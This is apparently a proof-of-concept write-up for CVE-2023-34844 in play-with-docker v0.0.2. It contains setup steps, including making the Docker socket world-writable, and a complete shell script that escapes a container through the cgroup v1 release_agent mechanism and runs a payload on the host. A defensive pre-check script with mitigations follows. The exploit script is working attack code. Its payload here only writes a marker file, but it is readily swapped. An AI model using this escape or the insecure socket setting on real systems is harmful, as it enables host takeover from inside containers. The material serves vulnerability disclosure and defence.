References:
https://nvd.nist.gov/vuln/detail/CVE-2023-34844
https://www.cvedetails.com/cve/CVE-2023-34844/
https://hacku.top/wl/?id=MACBtnorZyp6hC3E5bw2CqBAusuWoKe3
https://github.com/play-with-docker/play-with-docker/tree/v0.0.2
Test environment:
Ubuntu 20.04 (5.11.0-34-generic)
Docker version 20.10.25, build 20.10.25-0ubuntu1~20.04.2
Test steps:
1. Run the following commands on the host (installs Go, checks out play-with-docker v0.0.2, makes the Docker socket writable for the PWD container, initialises a swarm and starts the stack with docker-compose)
$ cd
$ curl -LO https://storage.googleapis.com/golang/go1.7.linux-amd64.tar.gz
$ sudo rm -rf /usr/local/go
$ sudo tar -C /usr/local -xvzf go1.7.linux-amd64.tar.gz
$ cd
$ git clone --depth=1 https://github.com/play-with-docker/play-with-docker -b v0.0.2
$ cd play-with-docker
$ sudo chmod 0777 /var/run/docker.sock
$ docker run hello-world
$ sudo modprobe xt_ipvs
$ docker swarm init
$ docker pull franela/dind
$ go mod vendor
$ docker-compose up
pwd | 2023/10/10 05:30:46 Updating playgrounds configuration
pwd | 2023/10/10 05:30:46 Listening on port 3000
2. Open Firefox and browse to localhost
3. Click ADD NEW INSTANCE
4. Inside the new instance, create run.sh (vim run.sh) with the contents below. This is the cgroup v1 release_agent escape: a cgroup is mounted with notify_on_release set, release_agent is pointed at the payload through /proc/<host pid>/root of one of the instance's own processes (the host PID is unknown from inside, so it is brute-forced), and the kernel then runs the payload in the host's mount namespace. It requires CAP_SYS_ADMIN in the instance to mount the cgroup filesystem and a cgroup v1 hierarchy on the host.
#!/bin/sh
OUTPUT_DIR="/"
MAX_PID=65535
CGROUP_NAME="xyx"
CGROUP_MOUNT="/tmp/cgrp"
PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
OUTPUT_NAME="${CGROUP_NAME}_payload.out"
OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"

# Run a process for which we can search for (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
#!/bin/sh
OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}
# Commands to run on the host
touch /tmp/cve-2023-34844
ps -eaf > \${OUTPATH} 2>&1
__EOF__

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mkdir ${CGROUP_MOUNT}
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
TPID=1
while [ ! -f ${OUTPUT_PATH} ]
do
  if [ $((${TPID} % 100)) -eq 0 ]
  then
    echo "Checking pid ${TPID}"
    if [ ${TPID} -gt ${MAX_PID} ]
    then
      echo "Exiting at ${MAX_PID} :-("
      exit 1
    fi
  fi
  # Set the release_agent path to the guessed pid
  echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
  # Trigger execution of the release_agent
  sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
  TPID=$((${TPID} + 1))
done

# Wait for and cat the output
sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}
5. Run it inside the instance
[node1] (local) root@10.0.3.4 ~ $ chmod a+x ./run.sh
[node1] (local) root@10.0.3.4 ~ $ ./run.sh
6. Check the result on the host: the marker file created by the payload exists in the host's /tmp, confirming the payload ran outside the instance
$ ls /tmp/
cve-2023-34844
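Before running step 5 it is useful to know whether the two preconditions of the escape hold inside the instance: CAP_SYS_ADMIN in the effective capability set (otherwise mount -t cgroup fails) and a cgroup v1 hierarchy on the host (cgroup v2 has no release_agent file). The check below is an added example written for this write-up; it is not part of play-with-docker or of the original steps. It reads only /proc/self/status and /proc/self/mountinfo when run with --live; the SAMPLE_* texts are constructed inputs in the shape of those files, so it can also be exercised offline.

```shell
#!/bin/sh
# Pre-flight check for the cgroup v1 release_agent escape used in run.sh.
# Added example for this write-up; not part of play-with-docker or the
# original reproduction steps. With --live it reads /proc/self/status and
# /proc/self/mountinfo; otherwise it runs against the constructed samples.

CAP_SYS_ADMIN_BIT=21   # bit index of CAP_SYS_ADMIN in the CapEff mask

# Constructed sample inputs (shaped like the real /proc files, not captured).
SAMPLE_STATUS_DEFAULT='Name:	sh
CapEff:	00000000a80425fb'   # Docker default capability set
SAMPLE_STATUS_PRIV='Name:	sh
CapEff:	0000003fffffffff'   # docker run --privileged
SAMPLE_MOUNTINFO_V1='31 24 0:27 / /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory'
SAMPLE_MOUNTINFO_V2='30 24 0:26 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw'

# Print the CapEff hex mask found in /proc/<pid>/status text.
capeff_of() {
    printf '%s\n' "$1" | awk '/^CapEff:/ { print $2 }'
}

# Succeed if CAP_SYS_ADMIN is set in the given hex mask.
has_cap_sys_admin() {
    mask=$(( 0x$1 ))
    [ $(( (mask >> CAP_SYS_ADMIN_BIT) & 1 )) -eq 1 ]
}

# Print "v1", "v2" or "none" for the cgroup layout visible in mountinfo text.
# The fstype is the field after the "-" separator (optional fields may precede
# it). Any mount of fstype "cgroup" means a v1 hierarchy exists on the kernel,
# so mount -t cgroup -o memory and the release_agent file are available.
cgroup_layout() {
    printf '%s\n' "$1" | awk '
        { t = ""
          for (i = 7; i <= NF; i++) if ($i == "-") { t = $(i + 1); break }
          if (t == "cgroup") v1 = 1
          else if (t == "cgroup2") v2 = 1 }
        END { if (v1) print "v1"; else if (v2) print "v2"; else print "none" }'
}

# Print "feasible" when both preconditions hold, otherwise name the missing one.
escape_precheck() {
    status_text=$1
    mountinfo_text=$2
    if ! has_cap_sys_admin "$(capeff_of "$status_text")"; then
        echo "blocked: no CAP_SYS_ADMIN"
    elif [ "$(cgroup_layout "$mountinfo_text")" != "v1" ]; then
        echo "blocked: no cgroup v1 hierarchy"
    else
        echo "feasible"
    fi
}

if [ "$1" = "--live" ]; then
    escape_precheck "$(cat /proc/self/status)" "$(cat /proc/self/mountinfo)"
else
    echo "default caps, cgroup v1: $(escape_precheck "$SAMPLE_STATUS_DEFAULT" "$SAMPLE_MOUNTINFO_V1")"
    echo "privileged, cgroup v1:   $(escape_precheck "$SAMPLE_STATUS_PRIV" "$SAMPLE_MOUNTINFO_V1")"
    echo "privileged, cgroup v2:   $(escape_precheck "$SAMPLE_STATUS_PRIV" "$SAMPLE_MOUNTINFO_V2")"
fi
```

Run it as ./precheck.sh --live inside the instance; "feasible" means run.sh has what it needs, and the two "blocked" verdicts are also the two mitigations (drop CAP_SYS_ADMIN, or boot the host with cgroup v2 only so no v1 hierarchy can be mounted).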